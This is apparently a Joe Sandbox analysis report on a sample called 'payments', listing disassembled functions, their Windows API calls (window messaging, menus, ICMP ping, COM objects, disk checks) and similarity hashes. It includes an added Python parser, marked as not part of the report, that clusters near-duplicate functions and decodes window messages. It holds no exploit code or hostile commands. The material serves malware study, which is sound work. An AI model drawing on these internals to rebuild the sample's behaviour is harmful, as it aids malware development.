                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __itow__swprintf_xtow@16
                                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                                          • API String ID: 1502193981-2263619337
                                                                                                                          • Opcode ID: 14ae93742065e9824b55d459643868bdad422100ccbcff1c0929859bfb389ff6
                                                                                                                          • Instruction ID: b551567fafdd25dae6272a4fc3c66386f1691ceda232342b1fc21ac1926dbaf0
                                                                                                                          • Opcode Fuzzy Hash: 14ae93742065e9824b55d459643868bdad422100ccbcff1c0929859bfb389ff6
                                                                                                                          • Instruction Fuzzy Hash: 4941D371500205AFEB24EF79D946FAAB3E8FF49300F24446EE64AD71D1EA31DA41DB60
APIs
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CCB98C
• GetDlgCtrlID.USER32 ref: 00CCB997
• GetParent.USER32 ref: 00CCB9B3
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCB9B6
• GetDlgCtrlID.USER32(?), ref: 00CCB9BF
• GetParent.USER32(?), ref: 00CCB9DB
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCB9DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: @U=u$ComboBox$ListBox
• API String ID: 1383977212-2258501812
• Opcode ID: 24befe46c068c92a5bcc5333193587bab3eeac0445392e124ebd079c06b9f660
• Instruction ID: 4746c588deaf036ab1d7d15aa5e1ca5a4df43c8b811d35a13c6417a197b5046b
• Opcode Fuzzy Hash: 24befe46c068c92a5bcc5333193587bab3eeac0445392e124ebd079c06b9f660
• Instruction Fuzzy Hash: EA21A1B5900208BFDF04ABA4CC96EFEBB75EF49300F104119F661A32A1DB745916AB70
APIs
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CCBA73
• GetDlgCtrlID.USER32 ref: 00CCBA7E
• GetParent.USER32 ref: 00CCBA9A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCBA9D
• GetDlgCtrlID.USER32(?), ref: 00CCBAA6
• GetParent.USER32(?), ref: 00CCBAC2
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCBAC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: @U=u$ComboBox$ListBox
• API String ID: 1383977212-2258501812
• Opcode ID: cc3e7231f8bf6ca4ef787be8be96f84b85772423042cd8413469b2b3033697c9
• Instruction ID: 54486e75467742b5b1a83e24ea258baebcc3d02d174e6e359feb0db91ab3335e
• Opcode Fuzzy Hash: cc3e7231f8bf6ca4ef787be8be96f84b85772423042cd8413469b2b3033697c9
• Instruction Fuzzy Hash: 382183B5940208BFDF01ABA4CC86FFEB775EF49300F104019F55197291DB75991AAB70
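The two blocks above share API String ID 1383977212-2258501812 (same imports, same ComboBox/ListBox strings) but carry different Opcode IDs, which is what the Similarity fields are for: spotting near-duplicate functions and diffing them as a pair. The following parser is an added example and not part of the Joe Sandbox report or its IDA plugin; it reads blocks in this listing's format, clusters them by API String ID, and names the window message passed to each SendMessageW call. The sample input is the two ListBox blocks above, trimmed to the fields the parser uses. The message table covers only constants that appear on this page, and matching any argument against that table rather than a fixed position is an assumption made because the report's argument order varies between call sites.

```python
import re
from collections import defaultdict

# Constructed sample: the two "ListBox" function blocks from this report,
# trimmed to the fields the parser uses (values copied from the page).
SAMPLE = """\
APIs
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CCB98C
• GetDlgCtrlID.USER32 ref: 00CCB997
• GetParent.USER32 ref: 00CCB9B3
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCB9B6
Strings
Similarity
• API ID: MessageSend$CtrlParent
• String ID: @U=u$ComboBox$ListBox
• API String ID: 1383977212-2258501812
• Opcode ID: 24befe46c068c92a5bcc5333193587bab3eeac0445392e124ebd079c06b9f660
APIs
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CCBA73
• GetDlgCtrlID.USER32 ref: 00CCBA7E
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCBA9D
Similarity
• API ID: MessageSend$CtrlParent
• String ID: @U=u$ComboBox$ListBox
• API String ID: 1383977212-2258501812
• Opcode ID: cc3e7231f8bf6ca4ef787be8be96f84b85772423042cd8413469b2b3033697c9
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One "• Symbol.MODULE(args), ref: ADDR" line; the argument list and the
# "Part of subcall function" prefix are both optional in the report.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<sym>.+?)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")

# Window messages seen on this page (winuser.h / commctrl.h values).
MESSAGES = {
    0x0111: "WM_COMMAND",
    0x0186: "LB_SETCURSEL",
    0x018C: "LB_SELECTSTRING",
    0x1004: "LVM_GETITEMCOUNT",
    0x101F: "LVM_GETHEADER",
}


def _hex(arg):
    """Parse one report argument; '?' marks a value the sandbox could not resolve."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_blocks(text):
    """Split the listing into per-function blocks, one per leading 'APIs' header."""
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                block = {"apis": [], "similarity": {}}
                blocks.append(block)
            section = line
            continue
        if block is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group("args")
                block["apis"].append({
                    "sym": m.group("sym"),
                    "mod": m.group("mod"),
                    "args": args.split(",") if args else [],
                    "ref": m.group("ref"),
                    "subcall": m.group("sub"),
                })
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                block["similarity"][m.group("key")] = m.group("val")
    return blocks


def cluster_by_api_string_id(blocks):
    """Group Opcode IDs that share an 'API String ID': same imports and strings but
    different code bytes, i.e. near-duplicate functions worth diffing together."""
    clusters = defaultdict(list)
    for b in blocks:
        sim = b["similarity"]
        if "API String ID" in sim and "Opcode ID" in sim:
            clusters[sim["API String ID"]].append(sim["Opcode ID"])
    return {k: v for k, v in clusters.items() if len(v) > 1}


def decode_messages(block):
    """Name the window message in each SendMessageW call of a block. Heuristic: the
    report does not keep a fixed argument order across call sites, so any argument
    whose value is a known message constant is taken as the message."""
    out = []
    for call in block["apis"]:
        if call["sym"] != "SendMessageW":
            continue
        name = next((MESSAGES[v] for v in map(_hex, call["args"]) if v in MESSAGES), None)
        out.append((call["ref"], name))
    return out


if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE)
    for sid, opcodes in cluster_by_api_string_id(blocks).items():
        print(f"API String ID {sid} shared by {len(opcodes)} functions: {opcodes}")
    for b in blocks:
        print(b["similarity"]["Opcode ID"][:16], decode_messages(b))
```

Run as a script it prints the one cluster and the decoded calls: the first function resolves to LB_SELECTSTRING followed by WM_COMMAND, the second to LB_SETCURSEL followed by WM_COMMAND, so one selects a listbox entry by text and the other by index, and both then notify the parent window the way a user click would.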
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2620052-3771769585
• Opcode ID: 16a3ebbb6c546c9ecb312d9dad56eb863c160c6925f0dd56f213df38e85a0222
• Instruction ID: cc7db14f4ffe90f6f1d2d897225d16aa3a98d45bc6adb69cef2d419a4ca3f990
• Opcode Fuzzy Hash: 16a3ebbb6c546c9ecb312d9dad56eb863c160c6925f0dd56f213df38e85a0222
• Instruction Fuzzy Hash: B1110671904215BFCB24ABB0EC4AEDA77BCEF40714F104066F255E6281EF74DA86DBA0
APIs
• GetParent.USER32 ref: 00CCBAE3
• GetClassNameW.USER32(00000000,?,00000100), ref: 00CCBAF8
• _wcscmp.LIBCMT ref: 00CCBB0A
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CCBB85
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-1428604138
• Opcode ID: 876a593f5ce255b523e66e64ecba0281151ee7261a8d235374599ebfc98f7383
• Instruction ID: 6399551506445e4de8b649f997ad1fdb5aed8d8782adf71c8884d42818c6fab8
• Opcode Fuzzy Hash: 876a593f5ce255b523e66e64ecba0281151ee7261a8d235374599ebfc98f7383
• Instruction Fuzzy Hash: 5411E376608307FFFA2466A5DC27EF737AD9F11320F20402AF914E50D5EFA1AD119524
APIs
• _memset.LIBCMT ref: 00CB5047
  • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
• __gmtime64_s.LIBCMT ref: 00CB50E0
• __gmtime64_s.LIBCMT ref: 00CB5116
• __gmtime64_s.LIBCMT ref: 00CB5133
• __allrem.LIBCMT ref: 00CB5189
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB51A5
• __allrem.LIBCMT ref: 00CB51BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB51DA
• __allrem.LIBCMT ref: 00CB51F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB520F
• __invoke_watson.LIBCMT ref: 00CB5280
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction ID: e39c87c3c9338ca7ffbfaef222a847038b995a35e4abc01fb515c09b1d32ae69
• Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction Fuzzy Hash: 4871E7B2A01F16AFE714AF79CC81BDA73A8AF15764F144229F910D7281E770DE409BD1
APIs
• _memset.LIBCMT ref: 00CD4DF8
• GetMenuItemInfoW.USER32(00D51708,000000FF,00000000,00000030), ref: 00CD4E59
• SetMenuItemInfoW.USER32(00D51708,00000004,00000000,00000030), ref: 00CD4E8F
• Sleep.KERNEL32(000001F4), ref: 00CD4EA1
• GetMenuItemCount.USER32(?), ref: 00CD4EE5
• GetMenuItemID.USER32(?,00000000), ref: 00CD4F01
• GetMenuItemID.USER32(?,-00000001), ref: 00CD4F2B
• GetMenuItemID.USER32(?,?), ref: 00CD4F70
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CD4FB6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD4FCA
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD4FEB
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 8ebdea67401c97d2bc857cbaaaee65b730f5e6e379919afe590b248e8dfa76fe
• Instruction ID: 3203a3ecf5e617d56743d28c9e4876a48d1c26a72d7a1cb9239289ec020f8613
• Opcode Fuzzy Hash: 8ebdea67401c97d2bc857cbaaaee65b730f5e6e379919afe590b248e8dfa76fe
• Instruction Fuzzy Hash: 4261A171900349AFDB15CFA8D888AAEBBB9FB01308F14405AF751E73A1D730AE45DB20
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CF9C98
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CF9C9B
• GetWindowLongW.USER32(?,000000F0), ref: 00CF9CBF
• _memset.LIBCMT ref: 00CF9CD0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CF9CE2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CF9D5A
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: eafaff3a0f70c957ef3c438bb212bf57f718d6b8c65ac0818ce74ea850a94aad
• Instruction ID: af36292b87f9ed7cdc89b2af1021e0c69deec1c6cd48c179b76c7e0657713402
                                                                                                                          • Opcode Fuzzy Hash: eafaff3a0f70c957ef3c438bb212bf57f718d6b8c65ac0818ce74ea850a94aad
                                                                                                                          • Instruction Fuzzy Hash: F4617B75900208AFDB10DFA8CC81FFEB7B8EB09704F244159FA15E72A1D770AA46DB61
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00CC94FE
• SafeArrayAllocData.OLEAUT32(?), ref: 00CC9549
• VariantInit.OLEAUT32(?), ref: 00CC955B
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00CC957B
• VariantCopy.OLEAUT32(?,?), ref: 00CC95BE
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00CC95D2
• VariantClear.OLEAUT32(?), ref: 00CC95E7
• SafeArrayDestroyData.OLEAUT32(?), ref: 00CC95F4
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC95FD
• VariantClear.OLEAUT32(?), ref: 00CC960F
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC961A
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: b8acb693b0c3a052e4be16b59203614f765eabe67d5a10dc24bfd26cdf482fde
• Instruction ID: 1876ca6ff551549f4926f9213e915a983343e7f4c88c72d16d13387da6845c01
• Opcode Fuzzy Hash: b8acb693b0c3a052e4be16b59203614f765eabe67d5a10dc24bfd26cdf482fde
• Instruction Fuzzy Hash: 54411E71900219EFDB01EFA4D888EDEBB79FF08354F008069F512E7251DB31AA46DBA1
APIs
  • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
  • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
• CoInitialize.OLE32 ref: 00CEADF6
• CoUninitialize.OLE32 ref: 00CEAE01
• CoCreateInstance.OLE32(?,00000000,00000017,00D1D8FC,?), ref: 00CEAE61
• IIDFromString.OLE32(?,?), ref: 00CEAED4
• VariantInit.OLEAUT32(?), ref: 00CEAF6E
• VariantClear.OLEAUT32(?), ref: 00CEAFCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: ff5c03aa3f4b705111f45f4da2354938be8a263d7770d2459cd24f474165572b
• Instruction ID: 97458319d44329b15b740f9af6cdb7cdb270fc70a720b8dff2a5dd72d9637092
• Opcode Fuzzy Hash: ff5c03aa3f4b705111f45f4da2354938be8a263d7770d2459cd24f474165572b
• Instruction Fuzzy Hash: 66619D71208351AFC710DF96C849B6AB7E8AF88714F10441DF9959B2A1C770FE49CBA3
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00CACC15
  • Part of subcall function 00CACCCD: GetClientRect.USER32(?,?), ref: 00CACCF6
  • Part of subcall function 00CACCCD: GetWindowRect.USER32(?,?), ref: 00CACD37
  • Part of subcall function 00CACCCD: ScreenToClient.USER32(?,?), ref: 00CACD5F
• GetDC.USER32 ref: 00D0D137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D0D14A
• SelectObject.GDI32(00000000,00000000), ref: 00D0D158
• SelectObject.GDI32(00000000,00000000), ref: 00D0D16D
• ReleaseDC.USER32(?,00000000), ref: 00D0D175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D0D200
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: @U=u$U
• API String ID: 4009187628-4110099822
• Opcode ID: 71b33f4cd47b0c217d01a79b61bda590679ac0665731b3990a5e1f94743a9e69
• Instruction ID: b9c955b7ab280c9710a73bd293bd46f903271d4c817b771364c7c5805b40dcf4
• Opcode Fuzzy Hash: 71b33f4cd47b0c217d01a79b61bda590679ac0665731b3990a5e1f94743a9e69
• Instruction Fuzzy Hash: 9D71A234400309DFCF219FA4C885BEA7B76FF49324F18426AED59962A6CB318841DF71
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00CE8168
• inet_addr.WSOCK32(?,?,?), ref: 00CE81AD
• gethostbyname.WSOCK32(?), ref: 00CE81B9
• IcmpCreateFile.IPHLPAPI ref: 00CE81C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE8237
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE824D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CE82C2
• WSACleanup.WSOCK32 ref: 00CE82C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 4eceefbab929ba43e97c63fcf32b7d874daed739ccb836ba2cff74208ed405fa
• Instruction ID: b93a481714efdd5fa7f33cd3c5e145f0118faaece1191d164738ec6b36d21cbf
• Opcode Fuzzy Hash: 4eceefbab929ba43e97c63fcf32b7d874daed739ccb836ba2cff74208ed405fa
• Instruction Fuzzy Hash: 1151B031604701AFDB10AF66CC49B6AB7E5AF49310F048829FA6ADB2E0DF34E905DB51
APIs
  • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
  • Part of subcall function 00CAB63C: GetCursorPos.USER32(000000FF), ref: 00CAB64F
  • Part of subcall function 00CAB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB66C
  • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000001), ref: 00CAB691
  • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000002), ref: 00CAB69F
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00CFED3C
• ImageList_EndDrag.COMCTL32 ref: 00CFED42
• ReleaseCapture.USER32 ref: 00CFED48
• SetWindowTextW.USER32(?,00000000), ref: 00CFEDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CFEE03
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CFEEDC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
• API String ID: 1924731296-2104563098
• Opcode ID: 580728eaa67f1ae533d0d1a53ea71c4dba90177ae15f63b5628800b2da8d87c6
• Instruction ID: 97192ac2af0f8e5cb0bfabfc1af79b13107172cb7fca53284f7f954317421ab6
• Opcode Fuzzy Hash: 580728eaa67f1ae533d0d1a53ea71c4dba90177ae15f63b5628800b2da8d87c6
• Instruction Fuzzy Hash: 6951BA74204304AFD710EF24DC9AFAA77E5FB88715F00491DFA95972E2DB709A08DB62
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00CDE396
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CDE40C
• GetLastError.KERNEL32 ref: 00CDE416
• SetErrorMode.KERNEL32(00000000,READY), ref: 00CDE483
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: b0aa63108d54ea79d9333d27f8cbce4d651ec25dfe5fe664f1a3596beec306aa
• Instruction ID: e81ae057c4adea6697a19a6a8a5a6fc8d7b17330628f290826fbbc33b8ac0f53
• Opcode Fuzzy Hash: b0aa63108d54ea79d9333d27f8cbce4d651ec25dfe5fe664f1a3596beec306aa
• Instruction Fuzzy Hash: 24317435A00209AFDB01FFA8C989ABEB7B4EF44300F14801AE615EB391DB70DA42D751
APIs
• DeleteObject.GDI32(00000000), ref: 00CF8EE4
• GetDC.USER32(00000000), ref: 00CF8EEC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF8EF7
• ReleaseDC.USER32(00000000,00000000), ref: 00CF8F03
